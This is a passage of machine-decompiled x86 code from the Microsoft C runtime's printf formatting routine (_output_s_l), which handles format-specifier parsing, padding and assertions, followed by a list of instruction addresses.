                            																							_t115 = __ecx + 0x422640; // 0x1e4e9003
                            																							__edx =  *_t115 & 0x000000ff;
                            																							switch( *((intOrPtr*)(( *_t115 & 0x000000ff) * 4 +  &M0042262C))) {
                            																								case 0:
                            																									L53:
                            																									__edx =  *(__ebp + 0xc);
                            																									__eax =  *( *(__ebp + 0xc));
                            																									if( *( *(__ebp + 0xc)) != 0x36) {
                            																										L56:
                            																										__edx =  *(__ebp + 0xc);
                            																										__eax =  *( *(__ebp + 0xc));
                            																										if( *( *(__ebp + 0xc)) != 0x33) {
                            																											L59:
                            																											__edx =  *(__ebp + 0xc);
                            																											__eax =  *( *(__ebp + 0xc));
                            																											if( *( *(__ebp + 0xc)) == 0x64) {
                            																												L65:
                            																												L67:
                            																												goto L70;
                            																											}
                            																											L60:
                            																											__ecx =  *(__ebp + 0xc);
                            																											__edx =  *__ecx;
                            																											if( *__ecx == 0x69) {
                            																												goto L65;
                            																											}
                            																											L61:
                            																											__eax =  *(__ebp + 0xc);
                            																											__ecx =  *( *(__ebp + 0xc));
                            																											if(__ecx == 0x6f) {
                            																												goto L65;
                            																											}
                            																											L62:
                            																											__edx =  *(__ebp + 0xc);
                            																											__eax =  *( *(__ebp + 0xc));
                            																											if( *( *(__ebp + 0xc)) == 0x75) {
                            																												goto L65;
                            																											}
                            																											L63:
                            																											__ecx =  *(__ebp + 0xc);
                            																											__edx =  *__ecx;
                            																											if( *__ecx == 0x78) {
                            																												goto L65;
                            																											}
                            																											L64:
                            																											__eax =  *(__ebp + 0xc);
                            																											__ecx =  *( *(__ebp + 0xc));
                            																											if(__ecx != 0x58) {
                            																												L66:
                            																												 *(__ebp - 0x25c) = 0;
                            																												goto L18;
                            																											}
                            																											goto L65;
                            																										}
                            																										L57:
                            																										__ecx =  *(__ebp + 0xc);
                            																										__edx =  *((char*)(__ecx + 1));
                            																										if( *((char*)(__ecx + 1)) != 0x32) {
                            																											goto L59;
                            																										}
                            																										L58:
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																										__ecx =  *(__ebp - 0x10);
                            																										__ecx =  *(__ebp - 0x10) & 0xffff7fff;
                            																										 *(__ebp - 0x10) = __ecx;
                            																										goto L67;
                            																									}
                            																									L54:
                            																									__ecx =  *(__ebp + 0xc);
                            																									__edx =  *((char*)(__ecx + 1));
                            																									if( *((char*)(__ecx + 1)) != 0x34) {
                            																										goto L56;
                            																									}
                            																									L55:
                            																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																									__ecx =  *(__ebp - 0x10);
                            																									__ecx =  *(__ebp - 0x10) | 0x00008000;
                            																									 *(__ebp - 0x10) = __ecx;
                            																									goto L67;
                            																								case 1:
                            																									L68:
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																									goto L70;
                            																								case 2:
                            																									L49:
                            																									__eax =  *(__ebp + 0xc);
                            																									__ecx =  *( *(__ebp + 0xc));
                            																									if(__ecx != 0x6c) {
                            																										__ecx =  *(__ebp - 0x10);
                            																										__ecx =  *(__ebp - 0x10) | 0x00000010;
                            																										 *(__ebp - 0x10) = __ecx;
                            																									} else {
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																									}
                            																									goto L70;
                            																								case 3:
                            																									L69:
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																									goto L70;
                            																								case 4:
                            																									goto L70;
                            																							}
                            																						case 7:
                            																							goto L71;
                            																						case 8:
                            																							L30:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
                            																							goto L33;
                            																						case 9:
                            																							L31:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																							goto L33;
                            																						case 0xa:
                            																							L29:
                            																							__ecx =  *(__ebp - 0x10);
                            																							__ecx =  *(__ebp - 0x10) | 0x00000001;
                            																							 *(__ebp - 0x10) = __ecx;
                            																							goto L33;
                            																						case 0xb:
                            																							L28:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																							goto L33;
                            																						case 0xc:
                            																							L32:
                            																							__ecx =  *(__ebp - 0x10);
                            																							__ecx =  *(__ebp - 0x10) | 0x00000008;
                            																							 *(__ebp - 0x10) = __ecx;
                            																							goto L33;
                            																						case 0xd:
                            																							L33:
                            																							goto L218;
                            																					}
                            																				} else {
                            																					if(0 == 0) {
                            																						 *(_t699 - 0x314) = 0;
                            																					} else {
                            																						 *(_t699 - 0x314) = 1;
                            																					}
                            																					_t616 =  *(_t699 - 0x314);
                            																					 *(_t699 - 0x278) =  *(_t699 - 0x314);
                            																					if( *(_t699 - 0x278) == 0) {
                            																						_push(L"(\"Incorrect format specifier\", 0)");
                            																						_push(0);
                            																						_push(0x460);
                            																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																						_push(2);
                            																						_t545 = L0040E1A0();
                            																						_t702 = _t702 + 0x14;
                            																						if(_t545 == 1) {
                            																							asm("int3");
                            																						}
                            																					}
                            																					L14:
                            																					if( *(_t699 - 0x278) != 0) {
                            																						goto L16;
                            																					} else {
                            																						 *((intOrPtr*)(L0040EC70(_t616))) = 0x16;
                            																						E00411A50(_t589, _t616, _t697, _t698, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            																						 *(_t699 - 0x2f0) = 0xffffffff;
                            																						E0040D380(_t699 - 0x40);
                            																						_t518 =  *(_t699 - 0x2f0);
                            																						L229:
                            																						return E00416CA0(_t518, _t589,  *(_t699 - 0x48) ^ _t699, _t663, _t697, _t698);
                            																					}
                            																				}
                            																			}
                            																			L219:
                            																			if( *(_t699 - 0x25c) == 0 ||  *(_t699 - 0x25c) == 7) {
                            																				 *(_t699 - 0x334) = 1;
                            																			} else {
                            																				 *(_t699 - 0x334) = 0;
                            																			}
                            																			_t603 =  *(_t699 - 0x334);
                            																			 *(_t699 - 0x2e0) =  *(_t699 - 0x334);
                            																			if( *(_t699 - 0x2e0) == 0) {
                            																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            																				_push(0);
                            																				_push(0x8f5);
                            																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																				_push(2);
                            																				_t523 = L0040E1A0();
                            																				_t702 = _t702 + 0x14;
                            																				if(_t523 == 1) {
                            																					asm("int3");
                            																				}
                            																			}
                            																			if( *(_t699 - 0x2e0) != 0) {
                            																				 *(_t699 - 0x300) =  *(_t699 - 0x24c);
                            																				E0040D380(_t699 - 0x40);
                            																				_t518 =  *(_t699 - 0x300);
                            																			} else {
                            																				 *((intOrPtr*)(L0040EC70(_t603))) = 0x16;
                            																				E00411A50(_t589, _t603, _t697, _t698, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            																				 *(_t699 - 0x2fc) = 0xffffffff;
                            																				E0040D380(_t699 - 0x40);
                            																				_t518 =  *(_t699 - 0x2fc);
                            																			}
                            																			goto L229;
                            																		}
                            																		L191:
                            																		if(( *(_t699 - 0x10) & 0x00000040) != 0) {
                            																			if(( *(_t699 - 0x10) & 0x00000100) == 0) {
                            																				if(( *(_t699 - 0x10) & 0x00000001) == 0) {
                            																					if(( *(_t699 - 0x10) & 0x00000002) != 0) {
                            																						 *((char*)(_t699 - 0x14)) = 0x20;
                            																						 *(_t699 - 0x1c) = 1;
                            																					}
                            																				} else {
                            																					 *((char*)(_t699 - 0x14)) = 0x2b;
                            																					 *(_t699 - 0x1c) = 1;
                            																				}
                            																			} else {
                            																				 *((char*)(_t699 - 0x14)) = 0x2d;
                            																				 *(_t699 - 0x1c) = 1;
                            																			}
                            																		}
                            																		 *((intOrPtr*)(_t699 - 0x2c4)) =  *((intOrPtr*)(_t699 - 0x18)) -  *((intOrPtr*)(_t699 - 0x24)) -  *(_t699 - 0x1c);
                            																		if(( *(_t699 - 0x10) & 0x0000000c) == 0) {
                            																			E00422790(0x20,  *((intOrPtr*)(_t699 - 0x2c4)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
                            																			_t702 = _t702 + 0x10;
                            																		}
                            																		E004227D0( *(_t699 - 0x1c), _t699 - 0x14,  *(_t699 - 0x1c),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
                            																		_t702 = _t702 + 0x10;
                            																		if(( *(_t699 - 0x10) & 0x00000008) != 0 && ( *(_t699 - 0x10) & 0x00000004) == 0) {
                            																			E00422790(0x30,  *((intOrPtr*)(_t699 - 0x2c4)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
                            																			_t702 = _t702 + 0x10;
                            																		}
                            																		if( *(_t699 - 0xc) == 0 ||  *((intOrPtr*)(_t699 - 0x24)) <= 0) {
                            																			L212:
                            																			E004227D0( *((intOrPtr*)(_t699 - 4)),  *((intOrPtr*)(_t699 - 4)),  *((intOrPtr*)(_t699 - 0x24)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
                            																			_t702 = _t702 + 0x10;
                            																			goto L213;
                            																		} else {
                            																			L205:
                            																			 *(_t699 - 0x2dc) = 0;
                            																			 *((intOrPtr*)(_t699 - 0x2c8)) =  *((intOrPtr*)(_t699 - 4));
                            																			 *((intOrPtr*)(_t699 - 0x2cc)) =  *((intOrPtr*)(_t699 - 0x24));
                            																			while(1) {
                            																				L206:
                            																				 *((intOrPtr*)(_t699 - 0x2cc)) =  *((intOrPtr*)(_t699 - 0x2cc)) - 1;
                            																				if( *((intOrPtr*)(_t699 - 0x2cc)) == 0) {
                            																					break;
                            																				}
                            																				L207:
                            																				 *(_t699 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t699 - 0x2c8))));
                            																				_t563 = E004212A0(_t699 - 0x2d0, _t699 - 0x2d8, 6,  *(_t699 - 0x32e) & 0x0000ffff);
                            																				_t702 = _t702 + 0x10;
                            																				 *(_t699 - 0x2dc) = _t563;
                            																				 *((intOrPtr*)(_t699 - 0x2c8)) =  *((intOrPtr*)(_t699 - 0x2c8)) + 2;
                            																				if( *(_t699 - 0x2dc) != 0 ||  *((intOrPtr*)(_t699 - 0x2d0)) == 0) {
                            																					L209:
                            																					 *(_t699 - 0x24c) = 0xffffffff;
                            																					break;
                            																				} else {
                            																					L210:
                            																					E004227D0( *((intOrPtr*)(_t699 + 8)), _t699 - 0x2d8,  *((intOrPtr*)(_t699 - 0x2d0)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
                            																					_t702 = _t702 + 0x10;
                            																					continue;
                            																				}
                            																			}
                            																			L211:
                            																			L213:
                            																			if( *(_t699 - 0x24c) >= 0 && ( *(_t699 - 0x10) & 0x00000004) != 0) {
                            																				E00422790(0x20,  *((intOrPtr*)(_t699 - 0x2c4)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
                            																				_t702 = _t702 + 0x10;
                            																			}
                            																			goto L216;
                            																		}
                            																		L71:
                            																		__ecx =  *((char*)(__ebp - 0x251));
                            																		 *(__ebp - 0x324) = __ecx;
                            																		__edx =  *(__ebp - 0x324);
                            																		__edx =  *(__ebp - 0x324) - 0x41;
                            																		 *(__ebp - 0x324) = __edx;
                            																	} while ( *(__ebp - 0x324) > 0x37);
                            																	_t156 =  *(__ebp - 0x324) + 0x4226ac; // 0xcccccc0d
                            																	__ecx =  *_t156 & 0x000000ff;
                            																	switch( *((intOrPtr*)(__ecx * 4 +  &M00422670))) {
                            																		case 0:
                            																			L123:
                            																			 *(__ebp - 0x2c) = 1;
                            																			__ecx =  *((char*)(__ebp - 0x251));
                            																			__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
                            																			 *((char*)(__ebp - 0x251)) = __cl;
                            																			goto L124;
                            																		case 1:
                            																			L73:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																			}
                            																			goto L75;
                            																		case 2:
                            																			L88:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																			}
                            																			goto L90;
                            																		case 3:
                            																			L146:
                            																			 *((intOrPtr*)(__ebp - 0x260)) = 7;
                            																			goto L148;
                            																		case 4:
                            																			L81:
                            																			__eax = __ebp + 0x14;
                            																			 *(__ebp - 0x288) = E0041C290(__ebp + 0x14);
                            																			if( *(__ebp - 0x288) == 0) {
                            																				L83:
                            																				__edx =  *0x60b4f0; // 0x407424
                            																				 *(__ebp - 4) = __edx;
                            																				__eax =  *(__ebp - 4);
                            																				 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																				L87:
                            																				goto L190;
                            																			}
                            																			L82:
                            																			__ecx =  *(__ebp - 0x288);
                            																			if( *((intOrPtr*)( *(__ebp - 0x288) + 4)) != 0) {
                            																				L84:
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            																					 *(__ebp - 0xc) = 0;
                            																					__edx =  *(__ebp - 0x288);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x288);
                            																					__edx =  *__ecx;
                            																					 *(__ebp - 0x24) =  *__ecx;
                            																				} else {
                            																					__edx =  *(__ebp - 0x288);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x288);
                            																					__eax =  *__ecx;
                            																					asm("cdq");
                            																					 *__ecx - __edx =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0xc) = 1;
                            																				}
                            																				goto L87;
                            																			}
                            																			goto L83;
                            																		case 5:
                            																			L124:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			__eax = __ebp - 0x248;
                            																			 *(__ebp - 4) = __ebp - 0x248;
                            																			 *(__ebp - 0x44) = 0x200;
                            																			if( *(__ebp - 0x30) >= 0) {
                            																				L126:
                            																				if( *(__ebp - 0x30) != 0) {
                            																					L129:
                            																					if( *(__ebp - 0x30) > 0x200) {
                            																						 *(__ebp - 0x30) = 0x200;
                            																					}
                            																					L131:
                            																					if( *(__ebp - 0x30) > 0xa3) {
                            																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																						 *(__ebp - 0x20) = L0040B5C0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																						if( *(__ebp - 0x20) == 0) {
                            																							 *(__ebp - 0x30) = 0xa3;
                            																						} else {
                            																							__eax =  *(__ebp - 0x20);
                            																							 *(__ebp - 4) =  *(__ebp - 0x20);
                            																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																						}
                            																					}
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					__eax =  *(__ebp + 0x14);
                            																					__ecx =  *(__eax - 8);
                            																					__edx =  *(__eax - 4);
                            																					 *(__ebp - 0x2a8) =  *(__eax - 8);
                            																					 *(__ebp - 0x2a4) =  *(__eax - 4);
                            																					__ecx = __ebp - 0x40;
                            																					_push(E0040D3B0(__ebp - 0x40));
                            																					__eax =  *(__ebp - 0x2c);
                            																					_push( *(__ebp - 0x2c));
                            																					__ecx =  *(__ebp - 0x30);
                            																					_push( *(__ebp - 0x30));
                            																					__edx =  *((char*)(__ebp - 0x251));
                            																					_push( *((char*)(__ebp - 0x251)));
                            																					__eax =  *(__ebp - 0x44);
                            																					_push( *(__ebp - 0x44));
                            																					__ecx =  *(__ebp - 4);
                            																					_push( *(__ebp - 4));
                            																					__edx = __ebp - 0x2a8;
                            																					_push(__ebp - 0x2a8);
                            																					__eax =  *0x60b3cc; // 0x7e8c4bdb
                            																					__eax =  *__eax();
                            																					__esp = __esp + 0x1c;
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																					if(( *(__ebp - 0x10) & 0x00000080) != 0 &&  *(__ebp - 0x30) == 0) {
                            																						__ecx = __ebp - 0x40;
                            																						_push(E0040D3B0(__ebp - 0x40));
                            																						__edx =  *(__ebp - 4);
                            																						_push( *(__ebp - 4));
                            																						__eax =  *0x60b3d8; // 0x7e8c4bdb
                            																						__eax =  *__eax();
                            																						__esp = __esp + 8;
                            																					}
                            																					__ecx =  *((char*)(__ebp - 0x251));
                            																					if( *((char*)(__ebp - 0x251)) == 0x67) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																							__ecx = __ebp - 0x40;
                            																							_push(E0040D3B0(__ebp - 0x40));
                            																							__eax =  *(__ebp - 4);
                            																							_push( *(__ebp - 4));
                            																							__ecx =  *0x60b3d4; // 0x7e8c4bdb
                            																							E00410200(__ecx) =  *__eax();
                            																							__esp = __esp + 8;
                            																						}
                            																					}
                            																					__edx =  *(__ebp - 4);
                            																					__eax =  *( *(__ebp - 4));
                            																					if( *( *(__ebp - 4)) == 0x2d) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
                            																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
                            																					}
                            																					__eax =  *(__ebp - 4);
                            																					 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																					goto L190;
                            																				}
                            																				L127:
                            																				__ecx =  *((char*)(__ebp - 0x251));
                            																				if(__ecx != 0x67) {
                            																					goto L129;
                            																				}
                            																				L128:
                            																				 *(__ebp - 0x30) = 1;
                            																				goto L131;
                            																			}
                            																			L125:
                            																			 *(__ebp - 0x30) = 6;
                            																			goto L131;
                            																		case 6:
                            																			L75:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																				__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            																				 *(__ebp - 0x284) = __ax;
                            																				__cl =  *(__ebp - 0x284);
                            																				 *(__ebp - 0x248) = __cl;
                            																				 *(__ebp - 0x24) = 1;
                            																			} else {
                            																				 *(__ebp - 0x280) = 0;
                            																				__edx = __ebp + 0x14;
                            																				__eax = E0041C2D0(__ebp + 0x14);
                            																				 *(__ebp - 0x258) = __ax;
                            																				__eax =  *(__ebp - 0x258) & 0x0000ffff;
                            																				__ecx = __ebp - 0x248;
                            																				__edx = __ebp - 0x24;
                            																				 *(__ebp - 0x280) = E004212A0(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
                            																				if( *(__ebp - 0x280) != 0) {
                            																					 *(__ebp - 0x28) = 1;
                            																				}
                            																			}
                            																			__edx = __ebp - 0x248;
                            																			 *(__ebp - 4) = __ebp - 0x248;
                            																			goto L190;
                            																		case 7:
                            																			L144:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 8) = 0xa;
                            																			goto L153;
                            																		case 8:
                            																			L109:
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 0x298) = E0041C290(__ebp + 0x14);
                            																			if(E00420F80() != 0) {
                            																				L119:
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																					__edx =  *(__ebp - 0x298);
                            																					__eax =  *(__ebp - 0x24c);
                            																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																				} else {
                            																					__eax =  *(__ebp - 0x298);
                            																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
                            																				}
                            																				 *(__ebp - 0x28) = 1;
                            																				goto L190;
                            																			}
                            																			L110:
                            																			__edx = 0;
                            																			if(0 == 0) {
                            																				 *(__ebp - 0x32c) = 0;
                            																			} else {
                            																				 *(__ebp - 0x32c) = 1;
                            																			}
                            																			__eax =  *(__ebp - 0x32c);
                            																			 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
                            																			if( *(__ebp - 0x29c) == 0) {
                            																				_push(L"(\"\'n\' format specifier disabled\", 0)");
                            																				_push(0);
                            																				_push(0x695);
                            																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																				_push(2);
                            																				__eax = L0040E1A0();
                            																				__esp = __esp + 0x14;
                            																				if(__eax == 1) {
                            																					asm("int3");
                            																				}
                            																			}
                            																			if( *(__ebp - 0x29c) != 0) {
                            																				L118:
                            																				goto L190;
                            																			} else {
                            																				L117:
                            																				 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            																				__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            																				 *(__ebp - 0x2f8) = 0xffffffff;
                            																				__ecx = __ebp - 0x40;
                            																				__eax = E0040D380(__ecx);
                            																				__eax =  *(__ebp - 0x2f8);
                            																				goto L229;
                            																			}
                            																		case 9:
                            																			L151:
                            																			 *(__ebp - 8) = 8;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
                            																			}
                            																			goto L153;
                            																		case 0xa:
                            																			L145:
                            																			 *(__ebp - 0x30) = 8;
                            																			goto L146;
                            																		case 0xb:
                            																			L90:
                            																			if( *(__ebp - 0x30) != 0xffffffff) {
                            																				__edx =  *(__ebp - 0x30);
                            																				 *(__ebp - 0x328) =  *(__ebp - 0x30);
                            																			} else {
                            																				 *(__ebp - 0x328) = 0x7fffffff;
                            																			}
                            																			__eax =  *(__ebp - 0x328);
                            																			 *(__ebp - 0x290) =  *(__ebp - 0x328);
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
                            																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
                            																				L101:
                            																				if( *(__ebp - 4) == 0) {
                            																					__edx =  *0x60b4f0; // 0x407424
                            																					 *(__ebp - 4) = __edx;
                            																				}
                            																				__eax =  *(__ebp - 4);
                            																				 *(__ebp - 0x28c) =  *(__ebp - 4);
                            																				while(1) {
                            																					L104:
                            																					__ecx =  *(__ebp - 0x290);
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					if(__ecx == 0) {
                            																						break;
                            																					}
                            																					L105:
                            																					__eax =  *(__ebp - 0x28c);
                            																					__ecx =  *( *(__ebp - 0x28c));
                            																					if(__ecx == 0) {
                            																						break;
                            																					}
                            																					L106:
                            																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
                            																				}
                            																				L107:
                            																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) -  *(__ebp - 4);
                            																				 *(__ebp - 0x24) =  *(__ebp - 0x28c) -  *(__ebp - 4);
                            																				goto L108;
                            																			} else {
                            																				L94:
                            																				if( *(__ebp - 4) == 0) {
                            																					__eax =  *0x60b4f4; // 0x407414
                            																					 *(__ebp - 4) = __eax;
                            																				}
                            																				 *(__ebp - 0xc) = 1;
                            																				__ecx =  *(__ebp - 4);
                            																				 *(__ebp - 0x294) =  *(__ebp - 4);
                            																				while(1) {
                            																					L97:
                            																					__edx =  *(__ebp - 0x290);
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
                            																					if( *(__ebp - 0x290) == 0) {
                            																						break;
                            																					}
                            																					L98:
                            																					__ecx =  *(__ebp - 0x294);
                            																					__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
                            																					if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
                            																						break;
                            																					}
                            																					L99:
                            																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
                            																				}
                            																				L100:
                            																				 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
                            																				__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
                            																				 *(__ebp - 0x24) = __ecx;
                            																				L108:
                            																				goto L190;
                            																			}
                            																		case 0xc:
                            																			goto L0;
                            																		case 0xd:
                            																			L147:
                            																			 *((intOrPtr*)(__ebp - 0x260)) = 0x27;
                            																			L148:
                            																			 *(__ebp - 8) = 0x10;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				 *((char*)(__ebp - 0x14)) = 0x30;
                            																				 *((intOrPtr*)(__ebp - 0x260)) =  *((intOrPtr*)(__ebp - 0x260)) + 0x51;
                            																				 *((char*)(__ebp - 0x13)) = __al;
                            																				 *(__ebp - 0x1c) = 2;
                            																			}
                            																			goto L153;
                            																		case 0xe:
                            																			goto L190;
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            			}



























                            0x0042200b
                            0x0042200b
                            0x0042200b
                            0x0042200b
                            0x0042200b
                            0x0042200b
                            0x0042200b
                            0x0042200b
                            0x00000000
                            0x0042207a
                            0x00000000
                            0x0042207a
                            0x00000000
                            0x0042207a
                            0x0042207a
                            0x00422082
                            0x004220a4
                            0x004220aa
                            0x004220cf
                            0x00422116
                            0x00422119
                            0x0042213a
                            0x0042213f
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211f
                            0x00422124
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d7
                            0x004220f9
                            0x004220fe
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220dd
                            0x004220e2
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220b0
                            0x004220b5
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422088
                            0x0042208d
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422156
                            0x00422198
                            0x0042219e
                            0x004221aa
                            0x00000000
                            0x00422158
                            0x00422158
                            0x00422158
                            0x0042215f
                            0x00000000
                            0x0042216c
                            0x0042216c
                            0x0042217a
                            0x0042217f
                            0x00422185
                            0x00422193
                            0x004221b0
                            0x004221b8
                            0x004221da
                            0x004221da
                            0x004221e4
                            0x004221f5
                            0x004221ff
                            0x00422201
                            0x00422201
                            0x004221e6
                            0x004221e6
                            0x004221e6
                            0x00422214
                            0x00422216
                            0x00422216
                            0x00422220
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00422241
                            0x00422244
                            0x0042224e
                            0x0042225d
                            0x00422266
                            0x0042227c
                            0x00422282
                            0x0042228f
                            0x0042229d
                            0x0042229d
                            0x004222ac
                            0x004222b4
                            0x004222b4
                            0x004222bc
                            0x004222c2
                            0x004222cb
                            0x004222d7
                            0x004222f0
                            0x004222f6
                            0x004222ff
                            0x004222ff
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00000000
                            0x00422302
                            0x00422302
                            0x00422302
                            0x00422306
                            0x004224ed
                            0x004224f1
                            0x004224f9
                            0x004224fe
                            0x00422501
                            0x00422501
